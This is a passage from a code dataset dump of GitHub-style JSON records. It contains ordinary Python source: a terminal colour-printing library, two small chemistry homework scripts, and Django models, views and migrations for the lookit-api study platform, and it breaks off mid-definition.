string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_blue_color)\n\n @staticmethod\n def magenta(string) -> str:\n \"\"\"\n Colorizes a string to magenta\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_magenta_color)\n\n @staticmethod\n def cyan(string) -> str:\n \"\"\"\n Colorizes a string to cyan\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_cyan_color)\n\n @staticmethod\n def white(string) -> str:\n \"\"\"\n Colorizes a string to white\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_white_color)\n\n\nif __name__ == \"__main__\":\n pass\n" }, { "alpha_fraction": 0.649632453918457, "alphanum_fraction": 0.6498075127601624, "avg_line_length": 43.066837310791016, "blob_id": "e5cbfcdc63afc9a1f0c5f4d6ac71255ae367d061", "content_id": "cabb7a5ff94a92e1f17cdf22f0e9a4bc3854080a", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17142, "license_type": "permissive", "max_line_length": 126, "num_lines": 389, "path": "/PrintTags/print_tags.py", "repo_name": "Frangmuler/PrintTags", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\n\nfrom .colors import Colors\n\n# Tags\ninfo_tag = '[info] '\nsuccess_tag = '[success] '\nnotice_tag = '[notice] '\ntimeout_tag = '[timeout] '\nwarn_tag = '[warn] '\nexit_tag = '[exit] '\nerror_tag = '[error] '\n\n\ndef _insert_prefix(prefix, *args) -> list:\n prefix = str(prefix)\n # Make args mutable as a list\n args = list(args)\n if not prefix.endswith(' '):\n prefix += ' '\n # Attach tag to first arg so separator doesn't catch it\n args[0] = prefix + str(args[0])\n return args\n\n\ndef _get_timestamp() -> str:\n return datetime.now().strftime('%d-%b-%Y %I:%M:%S%p ')\n\n\ndef black(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in black\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.black(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.black(sep),\n end=Colors.black(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef red(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in red\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.red(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.red(sep),\n end=Colors.red(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef green(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in green\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.green(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.green(sep),\n end=Colors.green(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef yellow(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in yellow\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.yellow(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.yellow(sep),\n end=Colors.yellow(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef blue(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in blue\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.blue(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.blue(sep),\n end=Colors.blue(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef magenta(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in magenta\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.magenta(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.magenta(sep),\n end=Colors.magenta(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef cyan(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in cyan\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.cyan(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.cyan(sep),\n end=Colors.cyan(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef white(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in white\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.white(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.white(sep),\n end=Colors.white(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\n# Tagged color printouts\n\ndef info(*args, tag=info_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used for printing basic information.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that will be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n cyan(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef success(*args, tag=success_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to indicate the successful execution of a process.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n green(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef notice(*args, tag=notice_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to print important information.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n blue(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef timeout(*args, tag=timeout_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to indicate the timeout of a process.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n yellow(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef warn(*args, tag=warn_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to highlight that there may be an issue, or that code has improperly executed.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n magenta(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef error(*args, tag=error_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Can be used to print the description or message associated with an exception.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n red(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\nif __name__ == \"__main__\":\n pass\n" } ]
3
jtse9/chem160homework5
https://github.com/jtse9/chem160homework5
e9780ac0c22129c4ae9374fd2b5375c08183bcc6
d90a5d84cd642bc17be84fd742aea62e3c15e72a
bc1ac21c37a36322a40896f75ac4648b9d4d4996
refs/heads/master
2020-08-07T05:04:39.782566
2019-10-07T06:23:21
2019-10-07T06:23:21
213,309,570
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4906832277774811, "alphanum_fraction": 0.6055900454521179, "avg_line_length": 25.91666603088379, "blob_id": "3838026543f369c6f260cf542a020eae9440d5d5", "content_id": "b730b8ac44ee89d36f058ce0d7dc311052f8a030", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 56, "num_lines": 12, "path": "/molemass.py", "repo_name": "jtse9/chem160homework5", "src_encoding": "UTF-8", "text": "names=[\"H\", \"C\", \"N\", \"O\",\"P\",\"S\"]\nmasses=[1.008,12.0107,14.00674,15.9994,30.973761,32.066]\nDict={}\nfor i in range(len(names)):\n Dict[names[i]]=masses[i]\nMolec=input(\"Enter molecule string without spaces: \")\ndef molemass(x):\n mm = 0\n string=x\n alist=list(x)\n mm= sum([Dict[k] for k in alist])\n print (mm)" }, { "alpha_fraction": 0.6182212829589844, "alphanum_fraction": 0.6898047924041748, "avg_line_length": 27.875, "blob_id": "f8de746631b37d8c5720093bdd3ad3f56a24e3b8", "content_id": "68af819b9596f6c0d42095d6a7eb5f464f79a51f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 102, "num_lines": 16, "path": "/hyperc_np.py", "repo_name": "jtse9/chem160homework5", "src_encoding": "UTF-8", "text": "import math, time, random\nimport numpy as np\nntrials = 10000000\ndist = 0\nt = time.process_time()\n\nx1 = np.random.random(ntrials)\ny1 = np.random.random(ntrials)\nx2 = np.random.random(ntrials)\ny2 = np.random.random(ntrials)\ndist = np.mean(np.sqrt((x1-x2)**2+(y1-y2)**2))\n\ne_time=time.process_time()-t\n\nex_dist = 1/15*(math.sqrt(2)+2+5*math.log(1+math.sqrt(2)))\nprint(\"Ntrials=%d Ave dist=%9.7f Exact dist=%9.7f Elapsed time=%6.2f\"%(ntrials,dist,ex_dist,e_time))" } ]
2
joaoalves2010/lookit-api
https://github.com/joaoalves2010/lookit-api
391b40915fc843ffacd957d100b200990da19245
ee0ded40bae1c20d93a883dcd55561ffd69a932f
ce4d77f4aa4d615ef3736ddef61ff204631959d9
refs/heads/master
2021-01-20T10:29:34.037473
2017-05-16T18:16:28
2017-05-16T18:16:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6474609375, "alphanum_fraction": 0.650390625, "avg_line_length": 32.032257080078125, "blob_id": "bd8989b45fcd6d73db58e6d2c5115daa64873988", "content_id": "18a19b7f2f9eb721d9a397776a6e6fd8d26136d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5120, "license_type": "permissive", "max_line_length": 131, "num_lines": 155, "path": "/studies/models.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "import uuid\n\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.text import slugify\n\nfrom accounts.models import DemographicData, Organization, User\nfrom guardian.shortcuts import assign_perm\nfrom project.fields.datetime_aware_jsonfield import DateTimeAwareJSONField\nfrom transitions.extensions import GraphMachine as Machine\n\nfrom . import workflow\n\n\nclass Study(models.Model):\n uuid = models.UUIDField(default=uuid.uuid4)\n name = models.CharField(max_length=255, blank=False, null=False)\n short_description = models.TextField()\n long_description = models.TextField()\n criteria = models.TextField()\n duration = models.TextField()\n contact_info = models.TextField()\n image = models.ImageField(null=True)\n organization = models.ForeignKey(Organization, on_delete=models.DO_NOTHING, related_name='studies', related_query_name='study')\n blocks = DateTimeAwareJSONField(default=dict)\n state = models.CharField(choices=workflow.STATE_CHOICES, max_length=25, default=workflow.STATE_CHOICES[0][0])\n public = models.BooleanField(default=False)\n\n def __init__(self, *args, **kwargs):\n super(Study, self).__init__(*args, **kwargs)\n self.machine = Machine(\n self,\n states=workflow.states,\n transitions=workflow.transitions,\n initial=self.state,\n send_event=True,\n before_state_change='check_permission',\n after_state_change='_finalize_state_change'\n )\n\n def __str__(self):\n return f'<Study: {self.name}>'\n\n class Meta:\n permissions = (\n ('can_view', 'View Study'),\n ('can_edit', 'Edit Study'),\n ('can_submit', 'Submit Study'),\n ('can_respond', 'Can Respond'),\n )\n\n # WORKFLOW CALLBACKS\n def check_permission(self, ev):\n user = ev.kwargs.get('user')\n if user.is_superuser:\n return\n raise\n\n def notify_administrators_of_submission(self, ev):\n # TODO\n pass\n\n def notify_submitter_of_approval(self, ev):\n # TODO\n pass\n\n def notify_submitter_of_rejection(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_retraction(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_activation(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_pause(self, ev):\n # TODO\n pass\n\n def notify_administrators_of_deactivation(self, ev):\n # TODO\n pass\n\n # Runs for every transition to log action\n def _log_action(self, ev):\n StudyLog.objects.create(action=ev.state.name, study=ev.model, user=ev.kwargs.get('user'))\n\n # Runs for every transition to save state and log action\n def _finalize_state_change(self, ev):\n ev.model.save()\n self._log_action(ev)\n\n# TODO Need a post_save hook for edit that pulls studies out of approved state\n# TODO or disallows editing in pre_save if they are approved\n\n@receiver(post_save, sender=Study)\ndef study_post_save(sender, **kwargs):\n \"\"\"\n Create groups for all newly created Study isntances. We only\n run on study creation to avoid having to check for existence\n on each call to Study.save.\n \"\"\"\n study, created = kwargs['instance'], kwargs['created']\n if created:\n from django.contrib.auth.models import Group\n for group in ['read', 'admin']:\n group_instance = Group.objects.create(name=f'{slugify(study.name)}-STUDY_{group}'.upper())\n for perm in Study._meta.permissions:\n # add only view permissions to non-admin\n if group == 'read' and perm != 'can_view':\n continue\n assign_perm(perm[0], group_instance, obj=study)\n\n\n\nclass Response(models.Model):\n study = models.ForeignKey(Study, on_delete=models.DO_NOTHING, related_name='responses')\n participant = models.ForeignKey(User, on_delete=models.DO_NOTHING)\n demographic_snapshot = models.ForeignKey(DemographicData, on_delete=models.DO_NOTHING)\n results = DateTimeAwareJSONField(default=dict)\n def __str__(self):\n return f'<Response: {self.study} {self.participant.get_short_name}>'\n\n class Meta:\n permissions = (\n ('view_response', 'View Response'),\n )\n\n\nclass Log(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n user = models.ForeignKey(User, on_delete=models.DO_NOTHING)\n\n def __str__(self):\n return f'<{self.__class__.name}: {self.action} @ {self.created_at:%c}>'\n\n class Meta:\n abstract = True\n\n\nclass StudyLog(Log):\n action = models.CharField(max_length=128)\n study = models.ForeignKey(Study, on_delete=models.DO_NOTHING, related_name='logs', related_query_name='logs')\n\n def __str__(self):\n return f'<StudyLog: {self.action} on {self.study.name} at {self.created_at} by {self.user.username}'\n\n\nclass ResponseLog(Log):\n action = models.CharField(max_length=128)\n response = models.ForeignKey(Response, on_delete=models.DO_NOTHING)\n" }, { "alpha_fraction": 0.7474048733711243, "alphanum_fraction": 0.754325270652771, "avg_line_length": 25.272727966308594, "blob_id": "dd9eb18a1db29b7cb29740883262172130eac91a", "content_id": "96a3b2346687e2683d6955fd45513b85b3115c9d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "permissive", "max_line_length": 59, "num_lines": 11, "path": "/api/urls.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom rest_framework.routers import DefaultRouter\n\nfrom api import views as api_views\n\nrouter = DefaultRouter()\nrouter.register(r'users', api_views.DemographicDataViewSet)\n\nurlpatterns = [\n url(r'^(?P<version>(v1|v2))/', include(router.urls))\n]\n" }, { "alpha_fraction": 0.8442906737327576, "alphanum_fraction": 0.8442906737327576, "avg_line_length": 31.11111068725586, "blob_id": "a77daedaf7eb77acfb3c33a4228a5e0a2d50d089", "content_id": "5c92d5ce3d0e52018d111aed5991bab3c4170cdf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "permissive", "max_line_length": 58, "num_lines": 9, "path": "/api/views.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\n\nfrom accounts.models import DemographicData\nfrom accounts.serializers import DemographicDataSerializer\n\n\nclass DemographicDataViewSet(viewsets.ModelViewSet):\n queryset = DemographicData.objects.all()\n serializer_class = DemographicDataSerializer\n" }, { "alpha_fraction": 0.5808170437812805, "alphanum_fraction": 0.6376554369926453, "avg_line_length": 25.809524536132812, "blob_id": "4588aff85847b6030161e9086d60ae07a7c35a36", "content_id": "dffae2621e818f4904f495f1516487b3c1ad2225", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 563, "license_type": "permissive", "max_line_length": 130, "num_lines": 21, "path": "/studies/migrations/0006_auto_20170426_1949.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11 on 2017-04-26 19:49\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('studies', '0005_auto_20170426_1741'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='response',\n name='study',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, related_name='responses', to='studies.Study'),\n ),\n ]\n" }, { "alpha_fraction": 0.5535250306129456, "alphanum_fraction": 0.5915972590446472, "avg_line_length": 35.841583251953125, "blob_id": "f464d0b29638a44c03459d7963921fcfb5ec890a", "content_id": "3c8ea71e5579c4743d6ca5fd722ca6a51ec38da4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11163, "license_type": "permissive", "max_line_length": 123, "num_lines": 303, "path": "/accounts/models.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "import base64\nimport hashlib\nimport uuid\n\nfrom django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.contrib.postgres.fields.array import ArrayField\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils.html import mark_safe\nfrom django.utils.text import slugify\nfrom django.utils.translation import ugettext as _\n\nimport pydenticon\nfrom django_countries.fields import CountryField\nfrom guardian.mixins import GuardianUserMixin\nfrom guardian.shortcuts import get_objects_for_user\nfrom localflavor.us.models import USStateField\nfrom localflavor.us.us_states import USPS_CHOICES\nfrom project.fields.datetime_aware_jsonfield import DateTimeAwareJSONField\n\n\nclass UserManager(BaseUserManager):\n\n def create_user(self, username, password=None):\n if not username:\n raise ValueError('Users must have a username')\n\n user = self.model(\n username=self.normalize_email(username),\n is_active=True,\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, username, password):\n user = self.create_user(username, password=password)\n user.is_superuser = True\n user.is_staff = True\n user.is_active = True\n user.save(using=self._db)\n return user\n\n\nclass Organization(models.Model):\n name = models.CharField(max_length=255, blank=False, null=False)\n url = models.URLField(verbose_name='Website')\n\n def __str__(self):\n return f'<Organization: {self.name}>'\n\n class Meta:\n permissions = (\n ('can_view', 'Can View'),\n ('can_edit', 'Can Edit'),\n ('can_create', 'Can Create'),\n ('can_remove', 'Can Remove'),\n )\n\n\n@receiver(post_save, sender=Organization)\ndef organization_post_save(sender, **kwargs):\n \"\"\"\n Create groups for all newly created Organization instances.\n We only run on Organization creation to avoid having to check\n existence on each call to Organization.save.\n \"\"\"\n organization, created = kwargs['instance'], kwargs['created']\n if created:\n from django.contrib.auth.models import Group\n from guardian.shortcuts import assign_perm\n for group in ['read', 'admin']:\n group_instance, created = Group.objects.get_or_create(name=f'{slugify(organization.name)}-ORG_{group}'.upper())\n for perm in Organization._meta.permissions:\n # add only view permissions to non-admin\n if group == 'read' and perm != 'can_view':\n continue\n assign_perm(perm[0], group_instance, obj=organization)\n\n\nclass User(AbstractBaseUser, PermissionsMixin, GuardianUserMixin):\n USERNAME_FIELD = EMAIL_FIELD = 'username'\n uuid = models.UUIDField(verbose_name='identifier', default=uuid.uuid4)\n username = models.EmailField(unique=True)\n given_name = models.CharField(max_length=255)\n middle_name = models.CharField(max_length=255, blank=True)\n family_name = models.CharField(max_length=255)\n organization = models.ForeignKey(Organization, on_delete=models.CASCADE,\n related_name='users', related_query_name='user', null=True, blank=True)\n _identicon = models.TextField(verbose_name='identicon')\n\n is_active = models.BooleanField(default=False)\n is_staff = models.BooleanField(default=False)\n\n @property\n def identicon(self):\n if not self._identicon:\n rbw = self._make_rainbow()\n generator = pydenticon.Generator(\n 5, 5, digest=hashlib.sha512, foreground=rbw, background='rgba(0,0,0,0)')\n png = generator.generate(str(self.uuid), 64, 64)\n b64_png = base64.b64encode(png)\n self._identicon = f'data:image/png;base64,{b64_png.decode()}'\n self.save()\n return self._identicon\n\n @property\n def identicon_html(self):\n return mark_safe(f'<img src=\"{str(self.identicon)}\" width=\"64\"/>')\n\n @property\n def is_participant(self):\n return self.demographics.exists()\n\n @property\n def studies(self):\n if not self.is_participant:\n return get_objects_for_user(self, ['studies.view_study', 'studies.edit_study'])\n return None\n\n def _make_rainbow(self):\n rbw = []\n for i in range(0, 255, 10):\n for j in range(0, 255, 10):\n for k in range(0, 255, 10):\n rbw.append(f'rgb({i},{j},{k})')\n return rbw\n\n def get_short_name(self):\n return self.uuid\n\n def get_full_name(self):\n return f'{self.given_name} {self.middle_name} {self.family_name}'\n\n def __str__(self):\n return f'<User: {self.uuid}>'\n\n objects = UserManager()\n\n class Meta:\n permissions = (\n ('can_create', 'Can Create'),\n ('can_view', 'Can View'),\n ('can_edit', 'Can Edit'),\n ('can_remove', 'Can Remove'),\n ('can_view_permissions', 'Can View Permissions'),\n ('can_edit_permissions', 'Can Edit Permissions'),\n )\n\n\nclass DemographicData(models.Model):\n RACE_CHOICES = (\n ('white', 'White'),\n ('hisp', 'Hispanic, Latino, or Spanish origin'),\n ('black', 'Black or African American'),\n ('asian', 'Asian'),\n ('native', 'American Indian or Alaska Native'),\n ('mideast-naf', 'Middle Eastern or North African'),\n ('hawaiian-pac-isl', 'Native Hawaiian or Other Pacific Islander'),\n ('other', 'Another race, ethnicity, or origin')\n )\n GENDER_CHOICES = (\n ('m', 'male'),\n ('f', 'female'),\n ('o', 'other'),\n ('na', 'prefer not to answer')\n )\n EDUCATION_CHOICES = (\n ('some', 'some or attending high school'),\n ('hs', 'high school diploma or GED'),\n ('col', 'some or attending college'),\n ('assoc', '2-year college degree'),\n ('bach', '4-year college degree'),\n ('grad', 'some or attending graduate or professional school'),\n ('prof', 'graduate or professional degree')\n )\n SPOUSE_EDUCATION_CHOICES = (\n ('some', 'some or attending high school'),\n ('hs', 'high school diploma or GED'),\n ('col', 'some or attending college'),\n ('assoc', '2-year college degree'),\n ('bach', '4-year college degree'),\n ('grad', 'some or attending graduate or professional school'),\n ('prof', 'graduate or professional degree'),\n ('na', 'not applicable - no spouse or partner')\n )\n NO_CHILDREN_CHOICES = (\n ('0', '0'),\n ('1', '1'),\n ('2', '2'),\n ('3', '3'),\n ('4', '4'),\n ('5', '5'),\n ('6', '6'),\n ('7', '7'),\n ('8', '8'),\n ('9', '9'),\n ('10', '10'),\n ('>10', 'More than 10')\n )\n AGE_CHOICES = (\n 